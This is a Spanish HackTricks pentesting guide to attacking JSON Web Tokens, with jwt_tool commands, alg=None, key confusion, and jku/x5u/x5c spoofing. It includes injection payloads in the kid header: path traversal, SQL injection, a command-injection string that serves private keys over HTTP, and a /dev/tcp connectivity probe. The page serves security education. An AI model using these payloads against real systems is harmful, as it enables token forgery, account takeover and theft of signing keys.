hacktricks/pentesting-web/hacking-jwt-json-web-tokens.md

254 lines
19 KiB
Markdown
Raw Normal View History

2023-06-05 18:33:24 +00:00
# Vulnerabilidades de JWT (Json Web Tokens)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtén el [**swag oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de Telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Comparte tus trucos de hacking enviando PRs al** [**repositorio de hacktricks**](https://github.com/carlospolop/hacktricks) **y al** [**repositorio de hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
2023-06-05 18:33:24 +00:00
</details>
![](<../.gitbook/assets/image (638) (3).png>)
**Consejo para bug bounty**: **regístrate** en **Intigriti**, una plataforma premium de **bug bounty creada por hackers, para hackers**. Únete a nosotros en [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) hoy mismo y comienza a ganar recompensas de hasta **$100,000**.
2023-06-05 18:33:24 +00:00
{% embed url="https://go.intigriti.com/hacktricks" %}
**Parte de esta publicación fue tomada de:** [**https://github.com/ticarpi/jwt\_tool/wiki/Attack-Methodology**](https://github.com/ticarpi/jwt\_tool/wiki/Attack-Methodology)\
**Autor de la gran herramienta para pentestear JWTs** [**https://github.com/ticarpi/jwt\_tool**](https://github.com/ticarpi/jwt\_tool)
2023-06-05 18:33:24 +00:00
### **Ganancias rápidas**
Ejecuta [**jwt\_tool**](https://github.com/ticarpi/jwt\_tool) en modo `¡Todas las pruebas!` y espera a que aparezcan las líneas verdes
2023-06-05 18:33:24 +00:00
```bash
python3 jwt_tool.py -M at \
-t "https://api.example.com/api/v1/user/76bab5dd-9307-ab04-8123-fda81234245" \
-rh "Authorization: Bearer eyJhbG...<JWT Token>"
2023-06-05 18:33:24 +00:00
```
Si tienes suerte, la herramienta encontrará algún caso en el que la aplicación web esté verificando incorrectamente el JWT:
2023-06-05 18:33:24 +00:00
![](<../.gitbook/assets/image (435).png>)
Luego, puedes buscar la solicitud en tu proxy o volcar el JWT utilizado para esa solicitud usando la herramienta jwt\_:
2023-06-05 18:33:24 +00:00
```bash
python3 jwt_tool.py -Q "jwttool_706649b802c9f5e41052062a3787b291"
```
### Manipular datos sin modificar nada
2023-06-05 18:33:24 +00:00
Puedes manipular los datos dejando la firma tal como está y comprobar si el servidor está verificando la firma. Intenta cambiar tu nombre de usuario a "admin", por ejemplo.
2023-06-05 18:33:24 +00:00
#### **¿Se verifica el token?**
2023-06-05 18:33:24 +00:00
- Si ocurre un mensaje de error, se está verificando la firma: lee cualquier información detallada que pueda filtrar algo sensible.
- Si la página devuelta es diferente, se está verificando la firma.
- Si la página es la misma, entonces no se está verificando la firma: ¡es hora de empezar a manipular las reclamaciones del Payload para ver qué puedes hacer!
2023-06-05 18:33:24 +00:00
### Origen
Verifica de dónde proviene el token en el historial de solicitudes de tu proxy. Debería ser creado en el servidor, no en el cliente.
2023-06-05 18:33:24 +00:00
- Si se vio por primera vez que venía del lado del cliente, entonces la **clave** es accesible para el código del lado del cliente: ¡búscala!
- Si se vio por primera vez que venía del servidor, entonces todo está bien.
2023-06-05 18:33:24 +00:00
### Duración
Verifica si el token dura más de 24 horas... tal vez nunca expire. Si hay un campo "exp", verifica si el servidor lo maneja correctamente.
2023-06-05 18:33:24 +00:00
### Fuerza bruta del secreto HMAC
[**Ver esta página.**](../generic-methodologies-and-resources/brute-force.md#jwt)
2023-06-05 18:33:24 +00:00
### Modificar el algoritmo a None (CVE-2015-9235)
Establece el algoritmo utilizado como "None" y elimina la parte de la firma.
2023-06-05 18:33:24 +00:00
Utiliza la extensión de Burp llamada "JSON Web Token" para probar esta vulnerabilidad y cambiar diferentes valores dentro del JWT (envía la solicitud a Repeater y en la pestaña "JSON Web Token" puedes modificar los valores del token. También puedes seleccionar poner el valor del campo "Alg" en "None").
2023-06-05 18:33:24 +00:00
### Cambiar el algoritmo de RS256(asimétrico) a HS256(simétrico) (CVE-2016-5431/CVE-2016-10555)
2023-06-05 18:33:24 +00:00
El algoritmo HS256 utiliza la clave secreta para firmar y verificar cada mensaje.\
El algoritmo RS256 utiliza la clave privada para firmar el mensaje y utiliza la clave pública para la autenticación.
Si cambias el algoritmo de RS256 a HS256, el código del backend utiliza la clave pública como clave secreta y luego utiliza el algoritmo HS256 para verificar la firma.
2023-06-05 18:33:24 +00:00
Luego, utilizando la clave pública y cambiando RS256 a HS256, podríamos crear una firma válida. Puedes obtener el certificado del servidor web ejecutando esto:
2023-06-05 18:33:24 +00:00
```bash
openssl s_client -connect example.com:443 2>&1 < /dev/null | sed -n '/-----BEGIN/,/-----END/p' > certificatechain.pem #For this attack you can use the JOSEPH Burp extension. In the Repeater, select the JWS tab and select the Key confusion attack. Load the PEM, Update the request and send it. (This extension allows you to send the "non" algorithm attack also). It is also recommended to use the tool jwt_tool with the option 2 as the previous Burp Extension does not always works well.
openssl x509 -pubkey -in certificatechain.pem -noout > pubkey.pem
```
### Nueva clave pública dentro del encabezado
Un atacante incrusta una nueva clave en el encabezado del token y el servidor utiliza esta nueva clave para verificar la firma (CVE-2018-0114).
Esto se puede hacer con la extensión "JSON Web Tokens" de Burp.\
(Envía la solicitud a Repeater, dentro de la pestaña JSON Web Token selecciona "CVE-2018-0114" y envía la solicitud).
2023-06-05 18:33:24 +00:00
### Suplantación de JWKS
Si el token utiliza una reclamación de encabezado "jku", verifica la URL proporcionada. Esta debería apuntar a una URL que contenga el archivo JWKS que contiene la Clave Pública para verificar el token. Manipula el token para que el valor de jku apunte a un servicio web donde puedas monitorear el tráfico.
2023-06-05 18:33:24 +00:00
Si obtienes una interacción HTTP, ahora sabes que el servidor está intentando cargar claves desde la URL que estás suministrando. _Utiliza la opción -S de jwt\_tool junto con el argumento -u_ [_http://example.com_](http://example.com) _para generar un nuevo par de claves, inyecta tu URL proporcionada, genera un JWKS que contenga la Clave Pública y firma el token con la Clave Privada_
2023-06-05 18:33:24 +00:00
### Problemas con "kid"
2023-06-05 18:33:24 +00:00
`kid` es una reclamación opcional de encabezado que contiene un identificador de clave, especialmente útil cuando tienes múltiples claves para firmar los tokens y necesitas buscar la correcta para verificar la firma.
2023-06-05 18:33:24 +00:00
#### Problemas con "kid" - revelar clave
2023-06-05 18:33:24 +00:00
Si se utiliza la reclamación "kid" en el encabezado, verifica el directorio web en busca de ese archivo o una variación del mismo. Por ejemplo, si `"kid":"key/12345"`, busca _/key/12345_ y _/key/12345.pem_ en la raíz del sitio web.
2023-06-05 18:33:24 +00:00
#### Problemas con "kid" - traversing de ruta
2023-06-05 18:33:24 +00:00
Si se utiliza la reclamación "kid" en el encabezado, verifica si puedes utilizar un archivo diferente en el sistema de archivos. Elige un archivo cuyo contenido puedas predecir, o tal vez prueba con `"kid":"/dev/tcp/yourIP/yourPort"` para probar la conectividad, o incluso algunos payloads de **SSRF**...\
_Utiliza la opción -T de jwt\_tool para manipular el JWT y cambiar el valor de la reclamación kid, luego elige mantener la firma original_
2023-06-05 18:33:24 +00:00
```bash
python3 jwt_tool.py <JWT> -I -hc kid -hv "../../dev/null" -S hs256 -p ""
```
Usando archivos dentro del host con contenido conocido, también puedes falsificar un JWT válido. Por ejemplo, en sistemas Linux, el archivo `/proc/sys/kernel/randomize_va_space` tiene el valor establecido en **2**. Entonces, al poner esa **ruta** dentro del parámetro "**kid**" y usar "**2**" como la **contraseña simétrica** para generar el JWT, deberías poder generar un nuevo JWT válido.
2023-06-05 18:33:24 +00:00
#### Problemas con "kid" - Inyección SQL
En un escenario donde el contenido de "kid" se utiliza para recuperar la contraseña de la base de datos, podrías cambiar la carga útil dentro del parámetro "kid" a: `non-existent-index' UNION SELECT 'ATTACKER';-- -` y luego firmar el JWT con la clave secreta `ATTACKER`.
2023-06-05 18:33:24 +00:00
#### Problemas con "kid" - Inyección de SO
En un escenario donde el parámetro "kid" contiene una ruta al archivo con la clave y esta ruta se está utilizando **dentro de un comando ejecutado**, podrías obtener RCE y exponer la clave privada con una carga útil como la siguiente: `/root/res/keys/secret7.key; cd /root/res/keys/ && python -m SimpleHTTPServer 1337&`
2023-06-05 18:33:24 +00:00
### Ataques varios
A continuación se presentan debilidades conocidas que se deben probar.
2023-06-05 18:33:24 +00:00
**Ataques de retransmisión entre servicios**
Algunas aplicaciones web utilizan un servicio JWT de confianza para generar y administrar tokens para ellos. En el pasado, ha habido casos en los que un token generado para uno de los clientes del servicio JWT puede ser aceptado por otro de los clientes del servicio JWT.\
Si observas que el JWT se emite o se renueva a través de un servicio de terceros, vale la pena identificar si puedes registrarte en otra cuenta de ese mismo servicio con el mismo nombre de usuario/correo electrónico. Si es así, intenta tomar ese token y reproducirlo en una solicitud a tu objetivo. ¿Es aceptado?
2023-06-05 18:33:24 +00:00
* Si se acepta tu token, es posible que tengas un problema crítico que te permita falsificar la cuenta de cualquier usuario. SIN EMBARGO, ten en cuenta que si te registras en una aplicación de terceros, es posible que necesites obtener permiso para realizar pruebas más amplias en caso de que entre en un área legal gris.
2023-06-05 18:33:24 +00:00
**¿Se verifica exp?**
2023-06-05 18:33:24 +00:00
La reclamación de carga útil "exp" se utiliza para verificar la caducidad de un token. Como los JWT se utilizan a menudo en ausencia de información de sesión, es necesario manejarlos con cuidado; en muchos casos, capturar y reproducir el JWT de otra persona te permitirá hacerse pasar por ese usuario.\
Una mitigación contra los ataques de reproducción de JWT (que es recomendada por el RFC de JWT) es utilizar la reclamación "exp" para establecer un tiempo de caducidad para el token. También es importante establecer las comprobaciones relevantes en la aplicación para asegurarse de que este valor se procese y el token se rechace cuando haya caducado. Si el token contiene una reclamación "exp" y los límites de tiempo de prueba lo permiten, intenta almacenar el token y reproducirlo después de que haya pasado el tiempo de caducidad. _Utiliza la opción -R de jwt\_tool para leer el contenido del token, que incluye el análisis de la marca de tiempo y la comprobación de caducidad (marca de tiempo en UTC)_
2023-06-05 18:33:24 +00:00
* Si el token aún se valida en la aplicación, esto puede ser un riesgo de seguridad, ya que el token puede NUNCA caducar.
2023-06-05 18:33:24 +00:00
### x5u y jku
#### jku
jku significa **URL del conjunto de claves JWK**.\
Si el token utiliza una reclamación "**jku**" en el **encabezado**, **verifica la URL proporcionada**. Esta debería apuntar a una URL que contenga el archivo JWKS que contiene la Clave Pública para verificar el token. Manipula el token para que el valor jku apunte a un servicio web donde puedas monitorear el tráfico.
2023-06-05 18:33:24 +00:00
Primero, necesitas crear un nuevo certificado con nuevas claves privadas y públicas.
2023-06-05 18:33:24 +00:00
```bash
openssl genrsa -out keypair.pem 2048
openssl rsa -in keypair.pem -pubout -out publickey.crt
openssl pkcs8 -topk8 -inform PEM -outform PEM -nocrypt -in keypair.pem -out pkcs8.key
```
Entonces puedes usar, por ejemplo, [**jwt.io**](https://jwt.io) para crear el nuevo JWT con las **claves públicas y privadas creadas y apuntando el parámetro jku al certificado creado**. Para crear un certificado jku válido, puedes descargar el original y cambiar los parámetros necesarios.
2023-06-05 18:33:24 +00:00
Puedes obtener los parámetros "e" y "n" de un certificado público usando:
```bash
from Crypto.PublicKey import RSA
fp = open("publickey.crt", "r")
key = RSA.importKey(fp.read())
fp.close()
print("n:", hex(key.n))
print("e:", hex(key.e))
```
#### x5u
URL X.509. Una URI que apunta a un conjunto de certificados públicos X.509 (un estándar de formato de certificado) codificados en formato PEM. El primer certificado en el conjunto debe ser el utilizado para firmar este JWT. Los certificados subsiguientes firman cada uno al anterior, completando así la cadena de certificados. X.509 está definido en RFC 52807. Se requiere seguridad de transporte para transferir los certificados.
2023-06-05 18:33:24 +00:00
Intenta **cambiar este encabezado por una URL bajo tu control** y verifica si se recibe alguna solicitud. En ese caso, **podrías manipular el JWT**.
2023-06-05 18:33:24 +00:00
Para forjar un nuevo token utilizando un certificado controlado por ti, necesitas crear el certificado y extraer las claves pública y privada:
2023-06-05 18:33:24 +00:00
```bash
openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout attacker.key -out attacker.crt
openssl x509 -pubkey -noout -in attacker.crt > publicKey.pem
```
Entonces puedes usar, por ejemplo, [**jwt.io**](https://jwt.io) para crear el nuevo JWT con las **claves públicas y privadas creadas y apuntando el parámetro x5u al certificado .crt creado**.
2023-06-05 18:33:24 +00:00
![](<../.gitbook/assets/image (439).png>)
También puedes abusar de ambas vulnerabilidades **para SSRFs**.
#### x5c
Este parámetro puede contener el **certificado en base64**:
![](<../.gitbook/assets/image (440).png>)
Si el atacante **genera un certificado autofirmado** y crea un token falsificado utilizando la clave privada correspondiente y reemplaza el valor del parámetro "x5c" con el certificado recién generado y modifica los otros parámetros, es decir, n, e y x5t, entonces esencialmente el token falsificado sería aceptado por el servidor.
2023-06-05 18:33:24 +00:00
```bash
openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout attacker.key -outattacker.crt
openssl x509 -in attacker.crt -text
```
### Clave Pública Incrustada (CVE-2018-0114)
2023-06-05 18:33:24 +00:00
Si el JWT tiene incrustada una clave pública como en el siguiente escenario:
![](<../.gitbook/assets/image (438).png>)
Utilizando el siguiente script de nodejs es posible generar una clave pública a partir de esos datos:
2023-06-05 18:33:24 +00:00
```bash
const NodeRSA = require('node-rsa');
const fs = require('fs');
n ="ANQ3hoFoDxGQMhYOAc6CHmzz6_Z20hiP1Nvl1IN6phLwBj5gLei3e4e-DDmdwQ1zOueacCun0DkX1gMtTTX36jR8CnoBRBUTmNsQ7zaL3jIU4iXeYGuy7WPZ_TQEuAO1ogVQudn2zTXEiQeh-58tuPeTVpKmqZdS3Mpum3l72GHBbqggo_1h3cyvW4j3QM49YbV35aHV3WbwZJXPzWcDoEnCM4EwnqJiKeSpxvaClxQ5nQo3h2WdnV03C5WuLWaBNhDfC_HItdcaZ3pjImAjo4jkkej6mW3eXqtmDX39uZUyvwBzreMWh6uOu9W0DMdGBbfNNWcaR5tSZEGGj2divE8";
e = "AQAB";
const key = new NodeRSA();
var importedKey = key.importKey({n: Buffer.from(n, 'base64'),e: Buffer.from(e, 'base64'),}, 'components-public');
console.log(importedKey.exportKey("public"));
```
Es posible generar una nueva clave privada/pública, incrustar la nueva clave pública dentro del token y usarla para generar una nueva firma:
```bash
openssl genrsa -out keypair.pem 2048
openssl rsa -in keypair.pem -pubout -out publickey.crt
openssl pkcs8 -topk8 -inform PEM -outform PEM -nocrypt -in keypair.pem -out pkcs8.key
```
Puedes obtener el "n" y el "e" utilizando este script de nodejs:
2023-06-05 18:33:24 +00:00
```bash
const NodeRSA = require('node-rsa');
const fs = require('fs');
keyPair = fs.readFileSync("keypair.pem");
const key = new NodeRSA(keyPair);
const publicComponents = key.exportKey('components-public');
console.log('Parameter n: ', publicComponents.n.toString("hex"));
console.log('Parameter e: ', publicComponents.e.toString(16));
```
Finalmente, utilizando la clave pública y privada y los nuevos valores "n" y "e", puedes usar [jwt.io](https://jwt.io) para falsificar un nuevo JWT válido con cualquier información.
2023-06-05 18:33:24 +00:00
### JTI (JWT ID)
La afirmación JTI (JWT ID) proporciona un identificador único para un token JWT. Se puede utilizar para evitar que el token se reproduzca.\
Sin embargo, imagina una situación en la que la longitud máxima del ID sea 4 (0001-9999). La solicitud 0001 y 10001 van a utilizar el mismo ID. Por lo tanto, si el backend incrementa el ID en cada solicitud, podrías abusar de esto para **reproducir una solicitud** (necesitando enviar 10000 solicitudes entre cada reproducción exitosa).
2023-06-05 18:33:24 +00:00
### Afirmaciones registradas de JWT
2023-06-05 18:33:24 +00:00
{% embed url="https://www.iana.org/assignments/jwt/jwt.xhtml#claims" %}
### Herramientas
{% embed url="https://github.com/ticarpi/jwt_tool" %}
<img src="../.gitbook/assets/i3.png" alt="" data-size="original">\
**Consejo de recompensa por errores**: **regístrate** en **Intigriti**, una plataforma premium de **recompensas por errores creada por hackers, para hackers**. ¡Únete a nosotros en [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) hoy mismo y comienza a ganar recompensas de hasta **$100,000**!
2023-06-05 18:33:24 +00:00
{% embed url="https://go.intigriti.com/hacktricks" %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
2023-06-05 18:33:24 +00:00
* Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com)
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de Telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
2023-06-05 18:33:24 +00:00
* **Comparte tus trucos de hacking enviando PR al** [**repositorio de hacktricks**](https://github.com/carlospolop/hacktricks) **y al** [**repositorio de hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>